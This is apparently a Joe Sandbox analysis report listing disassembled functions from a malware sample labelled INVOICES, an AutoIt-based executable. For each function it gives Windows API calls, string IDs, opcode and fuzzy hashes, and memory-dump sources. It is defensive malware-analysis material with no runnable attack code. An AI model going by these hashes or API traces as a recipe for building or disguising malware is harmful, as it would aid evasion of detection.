                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$_free
                                                                                                                                  • String ID: Oat
                                                                                                                                  • API String ID: 2620147621-2936667180
                                                                                                                                  • Opcode ID: c2d2703404fa24ff17e76d4c023d62d408b6f144af604a70b3da254e97472268
                                                                                                                                  • Instruction ID: b27c9035ea2772c575990698a084f652ff5a2557672593bfa4a20238d21eba90
                                                                                                                                  • Opcode Fuzzy Hash: c2d2703404fa24ff17e76d4c023d62d408b6f144af604a70b3da254e97472268
                                                                                                                                  • Instruction Fuzzy Hash: 31516B716083419FDB28CF28C881B6ABBE5BF85314F45892DE989C7351E739E915CB82
                                                                                                                                  Function 007462F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$_memmove
                                                                                                                                  • String ID: ERCP
                                                                                                                                  • API String ID: 2532777613-1384759551
                                                                                                                                  • Opcode ID: 47d4a23986eb7a6b55a488066d87265fcdefa9db10dd6ad0ec03a7ad7a5f4541
                                                                                                                                  • Instruction ID: 25051b6671c1f319a8784a3e2124aabd10b93d6f9a43731d4c7a5cdfd78bef4a
                                                                                                                                  • Opcode Fuzzy Hash: 47d4a23986eb7a6b55a488066d87265fcdefa9db10dd6ad0ec03a7ad7a5f4541
                                                                                                                                  • Instruction Fuzzy Hash: 6A51D271900349DBDB24DF69C8457EAB7F4EF05314F20856EE94ACB241E378EA85CB81
                                                                                                                                  Function 007B7978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007BF910,00000000,?,?,?,?), ref: 007B7A11
                                                                                                                                  • GetWindowLongW.USER32 ref: 007B7A2E
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007B7A3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long
                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                  • Opcode ID: 5a7626960706ea8d9b7931dd2268e474d56154eb0e35b80b3b9d4246b0a92fb2
                                                                                                                                  • Instruction ID: e7774859a347b26b1e1b6449d722e4cbf6a446e2b2ae478052eeb41a2b1c061c
                                                                                                                                  • Opcode Fuzzy Hash: 5a7626960706ea8d9b7931dd2268e474d56154eb0e35b80b3b9d4246b0a92fb2
                                                                                                                                  • Instruction Fuzzy Hash: 2631BE71204609ABDB158E38CC45BEA7BA9EB89324F208725F975A21E1D738ED51CB50
                                                                                                                                  Function 007B740B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007B7493
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007B74A7
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 007B74CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                  • Opcode ID: 3e907d8027275ba1fcbb6bac96927562b6d5a3c961bf28e63937b78884fe8c72
                                                                                                                                  • Instruction ID: d7c65db66a47182839ae991d9d4eb00998a764097d34414ec9bea84ee5b71460
                                                                                                                                  • Opcode Fuzzy Hash: 3e907d8027275ba1fcbb6bac96927562b6d5a3c961bf28e63937b78884fe8c72
                                                                                                                                  • Instruction Fuzzy Hash: AB21E232600218BBDF258F94DC46FEA3B79EF88724F110214FE146B1D0D6B9AC50CBA0
                                                                                                                                  Function 007B6CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007B6D6D
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007B6D7D
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007B6DA2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: 3ba6f132e3eeec6fe30f40ac166be58eb2944a176e18c7c92cc6b50672747104
                                                                                                                                  • Instruction ID: 0eaa2dfc3fa8248d2a687df30faee80bc27dfb808a18a2d1f722ca3b71c49adf
                                                                                                                                  • Opcode Fuzzy Hash: 3ba6f132e3eeec6fe30f40ac166be58eb2944a176e18c7c92cc6b50672747104
                                                                                                                                  • Instruction Fuzzy Hash: B921A472710118BFEF118F54DC85FFB3BAAEF89754F118124FA049B190C679AC5187A0
                                                                                                                                  Function 007B7740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007B77A4
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007B77B9
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007B77C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: fe3d805f5f6d6e59aa3e662580c358d74fab743405e27b4c6e8bcbf7b085fa26
                                                                                                                                  • Instruction ID: f8d24aba0dcad8a55fba495bcff423f84b6930faf667889e8373e8616fc9a24a
                                                                                                                                  • Opcode Fuzzy Hash: fe3d805f5f6d6e59aa3e662580c358d74fab743405e27b4c6e8bcbf7b085fa26
                                                                                                                                  • Instruction Fuzzy Hash: 2311E372254208BAEF149F74CC45FEB7BA9EFC9B24F014618FA41A60E0D676E811CB20
                                                                                                                                  Function 007AC104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00771CB7,?), ref: 007AC112
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007AC124
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                  • Opcode ID: 5209b6ab970c41b424f6ceb635f89e75c5a81c1fc700f5f6b5b9784bd86925c6
                                                                                                                                  • Instruction ID: 4559e915f622acf1fc22ae8e622d945899a39bb5adb6d170081715b680f60d24
                                                                                                                                  • Opcode Fuzzy Hash: 5209b6ab970c41b424f6ceb635f89e75c5a81c1fc700f5f6b5b9784bd86925c6
                                                                                                                                  • Instruction Fuzzy Hash: 2FE08CF820072BDFC7215B29CC08B4276E8EF0AB44B40C939E886D2250E77CC880CB10
                                                                                                                                  Function 00734C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734C2E), ref: 00734CA3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00734CB5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                  • Opcode ID: b0d2f0b2831a4593b4d1d8faa5dc6b2b14552a57bc3a5abc0bb166ac7a829cd7
                                                                                                                                  • Instruction ID: b81c4961175b3b3807c218cb022400452ca8e1db65260a725cc5100aefba6503
                                                                                                                                  • Opcode Fuzzy Hash: b0d2f0b2831a4593b4d1d8faa5dc6b2b14552a57bc3a5abc0bb166ac7a829cd7
                                                                                                                                  • Instruction Fuzzy Hash: 50D012B051172BCFD7245F39DD18B4676D5AF05B51F11CC39D895D6150D678D480C660
                                                                                                                                  Function 00734D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734D2E,?,00734F4F,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734D6F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00734D81
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                  • Opcode ID: 8b1c5a162f04bad659abac749e6196ea160d173ecb098f304f27e0a1d0045e1d
                                                                                                                                  • Instruction ID: a91ed21d0375bd9e3bbab063fe6a6f2ae2b0b0e6857edb17d0554af550fa2b88
                                                                                                                                  • Opcode Fuzzy Hash: 8b1c5a162f04bad659abac749e6196ea160d173ecb098f304f27e0a1d0045e1d
                                                                                                                                  • Instruction Fuzzy Hash: C9D0C270620717CFD7204F35CC0870672E9EF04741F00CD39D482C2250E678D480CA10
                                                                                                                                  Function 00734D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734CE1,?), ref: 00734DA2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734DB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                  • Opcode ID: 60eb9fa85155b888f5077cef934ff36bc8fd8c915fd1f1146ac7876ca193b6fa
                                                                                                                                  • Instruction ID: a11c46f4c1e7d0902f0b5939012ce4a7c5d7966d80f2c06f3c838239bc19ef5b
                                                                                                                                  • Opcode Fuzzy Hash: 60eb9fa85155b888f5077cef934ff36bc8fd8c915fd1f1146ac7876ca193b6fa
                                                                                                                                  • Instruction Fuzzy Hash: 9CD01270660717DFD7245F35DC08B4676D5AF05755F11CC39D8D6D6150E778D880C650
                                                                                                                                  Function 007B0E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,007B10C1), ref: 007B0E80
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007B0E92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                  • Opcode ID: 32cff744dbe990542bac6ed451492974332bd5275017f885090e71580794ab95
                                                                                                                                  • Instruction ID: ed29fec55b2971155e8b3a20d3dff206087606bc3006115f9b7170ed74358838
                                                                                                                                  • Opcode Fuzzy Hash: 32cff744dbe990542bac6ed451492974332bd5275017f885090e71580794ab95
                                                                                                                                  • Instruction Fuzzy Hash: A5D01271511717CFD7205F39CD087C776D4AF04751B11CC39E595D2190E678C480C650
                                                                                                                                  Function 007A91F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007A8E09,?,007BF910), ref: 007A9203
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007A9215
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                                  • Opcode ID: 8c66a7132c40ce231d800714d30023377151b862745deffc84a5a25b713ccf2f
                                                                                                                                  • Instruction ID: 294de7041c72f172b6be7b2ba7064f576787074858c94a126f827bd4335b2edc
                                                                                                                                  • Opcode Fuzzy Hash: 8c66a7132c40ce231d800714d30023377151b862745deffc84a5a25b713ccf2f
                                                                                                                                  • Instruction Fuzzy Hash: 82D0C27055071BDFD7204F35CC0870272D6AF05741B10CD39D885D2190D678C490C610
                                                                                                                                  Function 00771A6D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                  • Opcode ID: 5cb49544f7f14afb3993df491dfd9a07b684a6867a7bbc73b0afe07ded7b908c
                                                                                                                                  • Instruction ID: fdad800addad1ce944affbba6cfee56e98d62c26ce46f1d34c0d9576fd211533
                                                                                                                                  • Opcode Fuzzy Hash: 5cb49544f7f14afb3993df491dfd9a07b684a6867a7bbc73b0afe07ded7b908c
                                                                                                                                  • Instruction Fuzzy Hash: 03D01271805219EACF559A958C85DFD737CA708340F95C192F90AA1040E27D9B98DB21
                                                                                                                                  Function 007874A5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
